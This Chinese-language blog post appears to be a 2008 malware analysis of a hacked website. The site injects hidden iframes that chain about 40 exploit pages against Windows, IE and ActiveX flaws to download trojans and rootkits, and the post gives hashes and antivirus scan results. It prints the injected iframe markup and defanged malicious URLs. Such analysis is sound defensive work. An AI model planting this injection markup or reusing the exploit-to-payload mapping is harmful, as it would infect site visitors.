某国菜网利用N个漏洞挂马RootKit.Win32.RESSDT.dr等
某国菜网利用N个漏洞挂马RootKit.Win32.RESSDT.dr等
该网网页包含代码:
/---
<iframe. src=hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/1.htm width=1 height=0></iframe>
---/
#1 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/1.htm 包含代码:
/---
<iframe. src="ms08001.htm" width=100 height=0></iframe>
<iframe. src="CcXpsp.htm" width=100 height=0></iframe>
<iframe. src="CcIE.htm" width=100 height=0></iframe>
<iframe. src="baidu.htm" width=10 height=0></iframe>
<iframe. src="bfyy.htm" width=10 height=0></iframe>
<iframe. src="cx.htm" width=10 height=0></iframe>
<iframe. src="JetAudio.htm" width=10 height=0></iframe>
<iframe. src="lz.htm" width=10 height=0></iframe>
<iframe. src="Media.htm" width=10 height=0></iframe>
<iframe. src="ms06014.htm" width=10 height=0></iframe>
<iframe. src="ms06042.htm" width=10 height=0></iframe>
<iframe. src="ms07017.htm" width=10 height=0></iframe>
<iframe. src="ms07027.htm" width=10 height=0></iframe>
<iframe. src="ms07033.htm" width=10 height=0></iframe>
<iframe. src="ms07055.htm" width=10 height=0></iframe>
<iframe. src="Office.htm" width=10 height=0></iframe>
<iframe. src="Opera.htm" width=10 height=0></iframe>
<iframe. src="qvld.htm" width=10 height=0></iframe>
<iframe. src="real.htm" width=10 height=0></iframe>
<iframe. src="Baidu.htm" width=10 height=0></iframe>
<iframe. src="Ruising.htm" width=10 height=0></iframe>
<iframe. src="Ruising.htm" width=10 height=0></iframe>
<iframe. src="Thunder.htm" width=10 height=0></iframe>
<iframe. src="TTplayer.htm" width=10 height=0></iframe>
<iframe. src="uc.htm" width=10 height=0></iframe>
<iframe. src="xlkk.htm" width=10 height=0></iframe>
<iframe. src="sinatv.htm" width=10 height=0></iframe>
<iframe. src="icyfox.htm" width=10 height=0></iframe>
<iframe. src="icyfox1.htm" width=10 height=0></iframe>
<iframe. src="jetaudio.htm" width=10 height=0></iframe>
<iframe. src="media.htm" width=10 height=0></iframe>
<iframe. src="bfyy1.htm" width=10 height=0></iframe>
<iframe. src="06014.htm" width=10 height=0></iframe>
<iframe. src="sina.htm" width=10 height=0></iframe>
<iframe. src="08011.htm" width=10 height=0></iframe>
<iframe. src="ls1.htm" width=10 height=0></iframe>
<iframe. src="lsx.htm" width=10 height=0></iframe>
<iframe. src="xunlei5.htm" width=10 height=0></iframe>
<iframe. src="real11.htm" width=10 height=0></iframe>
<iframe. src="office08.htm" width=10 height=0></iframe>
<iframe. src="systrsy.htm" width=10 height=0></iframe>
<iframe. src="hy.htm" width=10 height=0></iframe>
<iframe. src="niu.htm" width=10 height=0></iframe>
<iframe. src="MsVs.htm" width=10 height=0></iframe>
---/
利用 ms06-014漏洞下载 hxxp://ruan*jian2008.cn/xzz.exe
#1.2 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/CcXpsp.htm
利用ms06-014漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
文件说明符 : D:/test/xzz.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-9-4 16:24:37
修改时间 : 2008-9-4 16:24:38
大小 : 45056 字节 44.0 KB
MD5 : 9f1d0331e7d9bb3e6a14f3d77e354890
SHA1: 78FE5A93EDAFFEA072239A8BE60106B054DB667D
CRC32: 2316933b
文件说明符 : D:/test/xzz.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-9-4 16:24:37
修改时间 : 2008-9-4 16:24:38
大小 : 45056 字节 44.0 KB
MD5 : 9f1d0331e7d9bb3e6a14f3d77e354890
SHA1: 78FE5A93EDAFFEA072239A8BE60106B054DB667D
CRC32: 2316933b
反病毒引擎 | 版本 | 最后更新 | 扫描结果 |
AhnLab-V3 | 2008.9.3.0 | 2008.09.04 | - |
AntiVir | 7.8.1.28 | 2008.09.04 | TR/Dropper.Gen |
Authentium | 5.1.0.4 | 2008.09.03 | W32/Heuristic-KPP!Eldorado |
Avast | 4.8.1195.0 | 2008.09.03 | Win32:Trojan-gen {Other} |
AVG | 8.0.0.161 | 2008.09.03 | Generic11.NRC |
BitDefender | 7.2 | 2008.09.04 | - |
CAT-QuickHeal | 9.50 | 2008.09.02 | - |
ClamAV | 0.93.1 | 2008.09.04 | - |
DrWeb | 4.44.0.09170 | 2008.09.04 | MULDROP.Trojan |
eSafe | 7.0.17.0 | 2008.09.03 | - |
eTrust-Vet | 31.6.6066 | 2008.09.03 | - |
Ewido | 4.0 | 2008.09.03 | - |
F-Prot | 4.4.4.56 | 2008.09.03 | W32/Heuristic-KPP!Eldorado |
F-Secure | 8.0.14332.0 | 2008.09.04 | - |
Fortinet | 3.14.0.0 | 2008.09.03 | - |
GData | 19 | 2008.09.04 | Win32:Trojan-gen |
Ikarus | T3.1.1.34.0 | 2008.09.04 | - |
K7AntiVirus | 7.10.439 | 2008.09.03 | - |
Kaspersky | 7.0.0.125 | 2008.09.04 | - |
McAfee | 5376 | 2008.09.03 | - |
Microsoft | 1.3903 | 2008.09.04 | - |
NOD32v2 | 3413 | 2008.09.04 | - |
Norman | 5.80.02 | 2008.09.03 | W32/Smalldrp.AIHN |
Panda | 9.0.0.4 | 2008.09.03 | Suspicious file |
PCTools | 4.4.2.0 | 2008.09.03 | - |
Prevx1 | V2 | 2008.09.04 | - |
Rising | 20.60.30.00 | 2008.09.04 | RootKit.Win32.RESSDT.dr |
Sophos | 4.33.0 | 2008.09.04 | Mal/Dropper-AB |
Sunbelt | 3.1.1582.1 | 2008.09.02 | - |
Symantec | 10 | 2008.09.04 | Downloader |
TheHacker | 6.3.0.8.072 | 2008.09.04 | - |
TrendMicro | 8.700.0.1004 | 2008.09.04 | - |
VBA32 | 3.12.8.4 | 2008.09.03 | - |
ViRobot | 2008.9.2.1361 | 2008.09.03 | - |
VirusBuster | 4.5.11.0 | 2008.09.03 | - |
Webwasher-Gateway | 6.6.2 | 2008.09.04 | Trojan.Dropper.Gen |
附加信息 |
---|
File size: 45056 bytes |
MD5...: 9f1d0331e7d9bb3e6a14f3d77e354890 |
SHA1..: 78fe5a93edaffea072239a8be60106b054db667d |
SHA256: 55ddfc834c2170e434106f08515bf54ec15522fec51c2e2a7a07bfd182e7233d |
SHA512: 446b2f5a017f28ab441b902975882b146164087aebec12e3f818af07e528c43f 2baf6e3610ef374da195bb591e316088afe88f11d25467bfe8557357f78cbd7c |
PEiD..: Armadillo v1.71 |
TrID..: File type identification Win32 Executable MS Visual C++ (generic) (65.2%) Win32 Executable Generic (14.7%) Win32 Dynamic Link Library (generic) (13.1%) Generic Win/DOS Executable (3.4%) DOS Executable Generic (3.4%) |
PEInfo: PE Structure information
( base data ) ( 4 sections ) ( 5 imports ) ( 0 exports ) |
#1.3 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/CcIE.htm
利用ms06-014漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.4 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/baidu.htm
利用BaiDu工具条(CLSID:{A7F05EE4-0426-454F-8013-C41E3596E9E9})下载hxxp://ruan*jian2008.*k**k*i.com/xzz.exe
#1.5 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/bfyy.htm
利用暴风影音(clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB)漏洞下载 hxxp://ruan*jian2008.*k**k*i.com/4.exe
文件说明符 : D:/test/4.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-9-4 16:43:49
修改时间 : 2008-9-4 16:46:30
大小 : 2222080 字节 2.122 MB
MD5 : 94ac223a30d22e18c24881e7e95728bc
SHA1: 5731768C4240D9912F02DF6AA8352B8F3F803866
CRC32: 7ec6399b
采用文件夹图标
文件 4.rar 接收于 2008.09.04 11:01:42 (CET) 结果: 12/36 (33.34%)
反病毒引擎 | 版本 | 最后更新 | 扫描结果 |
AhnLab-V3 | 2008.9.3.0 | 2008.09.04 | - |
AntiVir | 7.8.1.28 | 2008.09.04 | TR/Hijacker.Gen |
Authentium | 5.1.0.4 | 2008.09.03 | - |
Avast | 4.8.1195.0 | 2008.09.03 | Win32:Trojan-gen {Other} |
AVG | 8.0.0.161 | 2008.09.03 | PSW.Generic6.SCG |
BitDefender | 7.2 | 2008.09.04 | Dropped:Trojan.PWS.QQPass.NEG |
CAT-QuickHeal | 9.50 | 2008.09.02 | - |
ClamAV | 0.93.1 | 2008.09.04 | - |
DrWeb | 4.44.0.09170 | 2008.09.04 | MULDROP.Trojan |
eSafe | 7.0.17.0 | 2008.09.03 | - |
eTrust-Vet | 31.6.6069 | 2008.09.04 | - |
Ewido | 4.0 | 2008.09.03 | - |
F-Prot | 4.4.4.56 | 2008.09.03 | W32/Agent.S.gen!Eldorado |
F-Secure | 8.0.14332.0 | 2008.09.04 | - |
Fortinet | 3.14.0.0 | 2008.09.03 | - |
GData | 19 | 2008.09.04 | - |
Ikarus | T3.1.1.34.0 | 2008.09.04 | Trojan-PWS.Win32.QQPass.pb |
K7AntiVirus | 7.10.439 | 2008.09.03 | - |
Kaspersky | 7.0.0.125 | 2008.09.04 | - |
McAfee | 5376 | 2008.09.03 | - |
Microsoft | 1.3903 | 2008.09.04 | TrojanDropper:Win32/Delfdru.gen!A |
NOD32v2 | 3413 | 2008.09.04 | - |
Norman | 5.80.02 | 2008.09.03 | - |
Panda | 9.0.0.4 | 2008.09.03 | Suspicious file |
PCTools | 4.4.2.0 | 2008.09.03 | - |
Prevx1 | V2 | 2008.09.04 | - |
Rising | 20.60.30.00 | 2008.09.04 | - |
Sophos | 4.33.0 | 2008.09.04 | Mal/Behav-043 |
Sunbelt | 3.1.1592.1 | 2008.08.30 | - |
Symantec | 10 | 2008.09.04 | - |
TheHacker | 6.3.0.8.072 | 2008.09.04 | - |
TrendMicro | 8.700.0.1004 | 2008.09.04 | - |
VBA32 | 3.12.8.4 | 2008.09.02 | MalwareScope.Trojan-PSW.Game.16 |
ViRobot | 2008.9.2.1361 | 2008.09.03 | - |
VirusBuster | 4.5.11.0 | 2008.09.03 | - |
Webwasher-Gateway | 6.6.2 | 2008.09.04 | Trojan.Hijacker.Gen |
附加信息 |
---|
File size: 1836884 bytes |
MD5...: f90b42115323b398c54001a94623b3de |
SHA1..: 81d454d14047adc008d36954c2385d1e0388d7bc |
SHA256: a3edb0fa4d5996ee2d9275c72de6bf980b1fbb223a5d779007f54d8f66cb67b3 |
SHA512: 4096d3f11e30f747f90a7e7027bc50cdfc3b97a892daa24c0c1bbff151c500bb 5a92632320e01aeaf869babb8b48af17eb0c8c595ccfabd940d7f95b1ca2741e |
PEiD..: - |
TrID..: File type identification RAR Archive (83.3%) REALbasic Project (16.6%) |
PEInfo: - |
packers (Kaspersky): UPack |
#1.6 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/cx.htm
利用超星阅读器(clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2)漏洞下载hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.7 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/JetAudio.htm
利用韩国jetAudio播放器ActiveX(clsid:8D1636FD-CA49-4B4E-90E4-0A20E03A15E8)控件漏洞下载hxxp://ruan*jian2008.*k**k*i.com/xzz.exe
#1.8 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/lz.htm
利用联众世界(clsid:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞下载hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.9 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/Media.htm
利用ms07-017漏洞下载 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/wm.cur,hxxp://ruan*jian2008.*k**k*i.com/xzz.exe
#1.13 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/ms07027.htm
利用ms07-027漏洞下载 hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.14 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/ms07033.htm
利用ms07-033漏洞下载 hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.15 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/ms07055.htm
利用ms07-055漏洞下载 hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.16 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/Office.htm
利用Microsoft Office Snapshot Viewer ActiveX(clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9)漏洞下载 hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.17 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/Opera.htm
利用Opera浏览器漏洞下载 hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.18 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/qvld.htm
/---
文件不存在
---/
#1.19 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/real.htm
利用RealPlayer漏洞下载hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.20 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/Ruising.htm
利用瑞星免费在线查毒OL2005.dll ActiveX控件(clsid:E4E2F180-CB8B-4DE9-ACBB-DA745D3BA153)远程代码执行漏洞下载hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.21 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/Thunder.htm
利用迅雷(ThunderServer.webThunder.1)漏洞下载hxxp://ruan*jian2008.*k**k*i.com/xzz.exe
#1.22 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/TTplayer.htm
利用千千静听(TTplayer)ttp_mod.dll(CLSID:89AE5F82-410A-4040-9387-68D1144EFD03)析med文件堆溢出漏洞下载hxxp://ruan*jian2008.*k**k*i.com/xzz.exe
#1.23 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/uc.htm
利用新浪UC(BROWSER2UC.BROWSERToUC)溢出漏洞下载hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.24 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/xlkk.htm
利用迅雷看看(clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F)漏洞下载hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.25 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/sinatv.htm
利用新浪DLoader Class ActiveX控件(clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A)任意文件下载漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.26 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/icyfox.htm
下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.27 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/icyfox1.htm
下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.28 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/bfyy1.htm
利用新浪DLoader Class ActiveX控件(clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A)任意文件下载漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.29 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/08011.htm
利用MS08-011漏洞(Microsoft Office .WPS File Stack Overflow Exploit,clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6)下载 hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.30 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/ls1.htm
利用联众世界(clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69)漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.31 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/lsx.htm
利用联众世界(clsid:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.32 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/xunlei5.htm
利用迅雷5(clsid:EEDD6FF9-13DE-496B-9A1C-D78B3215E266)漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.33 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/real11.htm
/---
文件不存在
---/
#1.34 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/office08.htm
利用MS Office Snapshot Viewer ActiveX(snpvw.Snapshot Viewer Control.1) Exploit 下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.35 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/systrsy.htm
下载 hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe,1.exe,2.exe
文件说明符 : D:/test/1.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-8-31 18:15:35
修改时间 : 2008-8-31 18:15:42
大小 : 632832 字节 618.0 KB
MD5 : 83fcf34cef2699f9f29a7906f758e6d6
SHA1: 0C0E3EE9FDBC8355329CD9B5CA9FF82EF373E537
CRC32: 83590948
反病毒引擎 | 版本 | 最后更新 | 扫描结果 |
AhnLab-V3 | 2008.9.2.0 | 2008.09.02 | - |
AntiVir | 7.8.1.23 | 2008.09.01 | TR/Dropper.Gen |
Authentium | 5.1.0.4 | 2008.09.02 | - |
Avast | 4.8.1195.0 | 2008.09.01 | Win32:Monga |
AVG | 8.0.0.161 | 2008.09.01 | Pakes.L |
BitDefender | 7.2 | 2008.09.02 | Trojan.Inject.GO |
CAT-QuickHeal | 9.50 | 2008.08.29 | (Suspicious) - DNAScan |
ClamAV | 0.93.1 | 2008.09.02 | - |
DrWeb | 4.44.0.09170 | 2008.09.01 | - |
eSafe | 7.0.17.0 | 2008.09.01 | - |
eTrust-Vet | 31.6.6062 | 2008.09.01 | - |
Ewido | 4.0 | 2008.09.01 | - |
F-Prot | 4.4.4.56 | 2008.09.02 | W32/Hupigon.O.gen!Eldorado |
F-Secure | 7.60.13501.0 | 2008.09.02 | - |
Fortinet | 3.14.0.0 | 2008.09.02 | W32/Hupigon.GE!tr.bdr |
GData | 19 | 2008.09.02 | - |
Ikarus | T3.1.1.34.0 | 2008.09.02 | Virus.Win32.Virtualizer |
K7AntiVirus | 7.10.435 | 2008.09.01 | - |
Kaspersky | 7.0.0.125 | 2008.09.02 | - |
McAfee | 5374 | 2008.09.01 | - |
Microsoft | 1.3807 | 2008.09.02 | - |
NOD32v2 | 3406 | 2008.09.02 | - |
Norman | 5.80.02 | 2008.09.01 | - |
Panda | 9.0.0.4 | 2008.09.02 | - |
PCTools | 4.4.2.0 | 2008.09.01 | - |
Prevx1 | V2 | 2008.09.02 | - |
Rising | 20.60.10.00 | 2008.09.02 | - |
Sophos | 4.33.0 | 2008.09.02 | Mal/Emogen-E |
Sunbelt | 3.1.1592.1 | 2008.08.30 | VIPRE.Suspicious |
Symantec | 10 | 2008.09.02 | - |
TheHacker | 6.3.0.8.069 | 2008.09.01 | - |
TrendMicro | 8.700.0.1004 | 2008.09.02 | Cryp_Pai-6 |
VBA32 | 3.12.8.4 | 2008.09.01 | - |
ViRobot | 2008.9.1.1359 | 2008.09.01 | - |
VirusBuster | 4.5.11.0 | 2008.09.01 | - |
Webwasher-Gateway | 6.6.2 | 2008.09.01 | Trojan.Dropper.Gen |
附加信息 |
---|
File size: 632832 bytes |
MD5...: 83fcf34cef2699f9f29a7906f758e6d6 |
SHA1..: 0c0e3ee9fdbc8355329cd9b5ca9ff82ef373e537 |
SHA256: f24089c722f0c3a75486880df48be170e7ce158236fa24dcb29104aab095bc86 |
SHA512: c098704adc12aa51c2e58996b5cb4d9a4b7ce8f27e42a49c2e88e5fc1bbf866d 568a990515388f162672a2b1b64de1c83f9deaadf3af4f5ad497aa27afca02f8 |
PEiD..: ASProtect 1.33 - 2.1 Registered -> Alexey Solodovnikov |
TrID..: File type identification Win32 Executable Generic (68.0%) Generic Win/DOS Executable (15.9%) DOS Executable Generic (15.9%) Autodesk FLIC Image File (extensions: flc, fli, cel) (0.0%) |
PEInfo: PE Structure information
( base data ) ( 6 sections ) ( 3 imports ) ( 0 exports ) |
packers (Kaspersky): PE_Patch |
packers (Avast): ASProtect |
文件说明符 : D:/test/2.exe
属性 : A---
数字签名:否
PE文件:是
语言 : 中文(中国)
文件版本 : 6.00.2900.3300 (xpsp.080125-2028)
说明 : Win32 Cabinet Self-Extractor
版权 : (C) Microsoft Corporation. 保留所有权利.
产品版本 : 6.00.2900.3300
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
内部名称 : Wextract
源文件名 : WEXTRACT.EXE
创建时间 : 2008-8-31 18:15:25
修改时间 : 2008-8-31 18:15:33
大小 : 740352 字节 723.0 KB
MD5 : 60ad4121a6309e439b74dc7bb749e553
SHA1: 8793BC8001E902588910C880B2BF77331F075DCE
CRC32: 2334ca4c
内含:5.exe
文件说明符 : D:/test/5.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-7-17 11:1:36
修改时间 : 2008-7-17 11:1:36
大小 : 681984 字节 666.0 KB
MD5 : 457870fa5975fdcf39ceeca5c85948e3
SHA1: E618F83981A32C5FEEA71357287F768C4B786093
CRC32: c887cd8b
反病毒引擎 | 版本 | 最后更新 | 扫描结果 |
AhnLab-V3 | 2008.9.2.0 | 2008.09.02 | - |
AntiVir | 7.8.1.23 | 2008.09.01 | TR/Crypt.XPACK.Gen |
Authentium | 5.1.0.4 | 2008.09.02 | - |
Avast | 4.8.1195.0 | 2008.09.01 | - |
AVG | 8.0.0.161 | 2008.09.01 | - |
BitDefender | 7.2 | 2008.09.02 | MemScan:Trojan.Dropper.Delf.BCB |
CAT-QuickHeal | 9.50 | 2008.08.29 | (Suspicious) - DNAScan |
ClamAV | 0.93.1 | 2008.09.02 | - |
DrWeb | 4.44.0.09170 | 2008.09.01 | - |
eSafe | 7.0.17.0 | 2008.09.01 | - |
eTrust-Vet | 31.6.6062 | 2008.09.01 | - |
Ewido | 4.0 | 2008.09.01 | - |
F-Prot | 4.4.4.56 | 2008.09.02 | - |
F-Secure | 7.60.13501.0 | 2008.09.02 | - |
Fortinet | 3.14.0.0 | 2008.09.02 | - |
GData | 19 | 2008.09.02 | - |
Ikarus | T3.1.1.34.0 | 2008.09.02 | - |
K7AntiVirus | 7.10.435 | 2008.09.01 | - |
Kaspersky | 7.0.0.125 | 2008.09.02 | - |
McAfee | 5374 | 2008.09.01 | - |
Microsoft | 1.3807 | 2008.09.02 | - |
NOD32v2 | 3406 | 2008.09.02 | - |
Norman | 5.80.02 | 2008.09.01 | - |
Panda | 9.0.0.4 | 2008.09.02 | Suspicious file |
PCTools | 4.4.2.0 | 2008.09.01 | - |
Prevx1 | V2 | 2008.09.02 | - |
Rising | 20.60.10.00 | 2008.09.02 | - |
Sophos | 4.33.0 | 2008.09.02 | - |
Sunbelt | 3.1.1592.1 | 2008.08.30 | VIPRE.Suspicious |
Symantec | 10 | 2008.09.02 | - |
TheHacker | 6.3.0.8.069 | 2008.09.01 | - |
TrendMicro | 8.700.0.1004 | 2008.09.02 | - |
VBA32 | 3.12.8.4 | 2008.09.01 | - |
ViRobot | 2008.9.1.1359 | 2008.09.01 | - |
VirusBuster | 4.5.11.0 | 2008.09.01 | - |
Webwasher-Gateway | 6.6.2 | 2008.09.01 | Trojan.Crypt.XPACK.Gen |
附加信息 |
---|
File size: 681984 bytes |
MD5...: 457870fa5975fdcf39ceeca5c85948e3 |
SHA1..: e618f83981a32c5feea71357287f768c4b786093 |
SHA256: f560317472a5c3e5a00c53ae04d2540135cf87406b9cd1229503f1367549193d |
SHA512: fa619305dbd55713d5a640d57d3a15543a1a1afcada8d79dcc00ab57943f203a 3e5e1873576887c0984b0882568cc1050dfef1333adadbd263523a46facfaedb |
PEiD..: ASProtect v1.23 RC1 |
TrID..: File type identification Win32 Executable Generic (58.3%) Win16/32 Executable Delphi generic (14.1%) Generic Win/DOS Executable (13.7%) DOS Executable Generic (13.6%) Autodesk FLIC Image File (extensions: flc, fli, cel) (0.0%) |
PEInfo: PE Structure information
( base data ) ( 11 sections ) ( 5 imports ) ( 0 exports ) |
packers (Kaspersky): PE_Patch |
packers (F-Prot): Aspack |
#1.36 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/hy.htm(卡巴斯基已检测到: 木马程序 Trojan-Downloader.VBS.Psyme.fd)
利用ms06-014漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.36.1 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/huoyan.htm
/---
文件不存在
---/
#1.36.2 hxxp://www.*es**8**6.com/pic/ddb/2006692151148920.gif
/---
文件不存在
---/
某国菜网利用N个漏洞挂马RootKit.Win32.RESSDT.dr等相关推荐
- 利用知名站点欺骗挂马
利用知名站点欺骗挂马 网络上有许多"钓鱼(Pushing)"式攻击,通过各种手段诱骗上网者浏览恶意的网站,导致各种网银或游戏帐号密码丢失.同样的,钓鱼式攻击也被用在欺骗性传播网页木 ...
- 某夏露官方网传播 RootKit.Win32.RESSDT.o/Trojan-Downloader.Win32.Agent.mjp
某夏露官方网传播 RootKit.Win32.RESSDT.o/Trojan-Downloader.Win32.Agent.mjp endurer 原创 2008-04-09 第1版 该网站首页 包含 ...
- 勒索软件利用IE漏洞挂马传播,腾讯零信任iOA、腾讯电脑管家支持检测拦截
腾讯安全检测到有网络黑产利用微软9月份和3月份已修复的两个IE 高危漏洞构造恶意广告页面挂马攻击,当存在漏洞的系统访问攻击者恶意构造的页面时,会触发恶意代码执行,之后下载Magniber勒索软件. M ...
- yapi漏洞挂马程序chongfu.sh处理
一.[背景]服务器网络卡顿,频繁对外发包,导致服务器网络崩溃. 二.[排查] 2.1 登陆异常服务器,通过top 未检查到异常的CPU 内存异常现象. 2.2 检查网络 netstat -n | aw ...
- metasploit利用IE漏洞XSS挂马拿内网主机
http://www.2cto.com/Article/201407/315176.html metasploit内网渗透方面好多方式,这只是科普下xss在内网中的利用. 用到的工具:beEF+msf ...
- 利用第三方浏览器漏洞钓鱼
6.4 利用第三方浏览器漏洞钓鱼 现在各种各样的浏览器导出不穷,然而都是建立在IE内核基础上的,而且在安全方面,这些"扩展"版本浏览器远比IE差了许多,很可能IE正常访问的页面,被 ...
- 网神SecVSS 3600漏洞扫描系统
网神SecVSS 3600漏洞扫描系统严格按照计算机信息系统安全的国家标准.相关行业标准设计.编写.制造.网神SecVSS 3600漏洞扫描系统可以对不同操作系统下的计算机(在可扫描IP范围内)进行漏 ...
- 紧跟热点:爱乐活联合Qzone推出《舌尖上的中国菜》
纪录片<舌尖上的中国>这个热议的话题已经传遍中国的大江南北,引爆了数千年饮食文化的中国,节目抓住了中国饮食背后的文化核心,体现中国人"民以食为天"的价值观,让中国人在饮 ...
- 赴美IPO后,美菜网还能在卖菜行业保持“低调”吗?
生鲜电商赛道再起风云,美菜网被传拟赴美IPO. 5月11日,据路透社报道,中国生鲜移动电商平台美菜网拟赴美IPO,计划筹资5亿美元.知情人士透露,该公司正在与财务顾问就潜在的IPO事宜进行合作.然而美 ...
最新文章
- 你不知道的Vue响应式原理
- eslint 学习笔记
- 【python3】 抓取异常信息try/except
- centos国内yum源
- linux培训课程第六天:ppt以及笔记
- 网络安全工作中最可怕的14种自己人
- Python字典按值排序、包含字典的列表按字典值排序的方法
- URAL1018 Binary Apple Tree
- MyEclipse10.6 安装SVN插件方法及插件下载地址
- Android Toast的立即取消与显示
- Android Protect-0.重新打包和签名
- linux识别硬盘时显示gpt,Ubuntu不识别GPT硬盘已有系统的解决方案
- CIA长期对华开展网络攻击,谍影重重缘起此处
- 项目管理培训的一些总结
- 云服务上搭建halo博客
- BDTC 2017丨探索大数据在医疗行业的应用实践
- 面对“惜命且老龄化”的年代,移动健康医疗需加速布局
- 传智播客设计学院简介代码
- Adobe Dreamweaver CC 2020中文版
- Ardunio开发实例-磁簧开关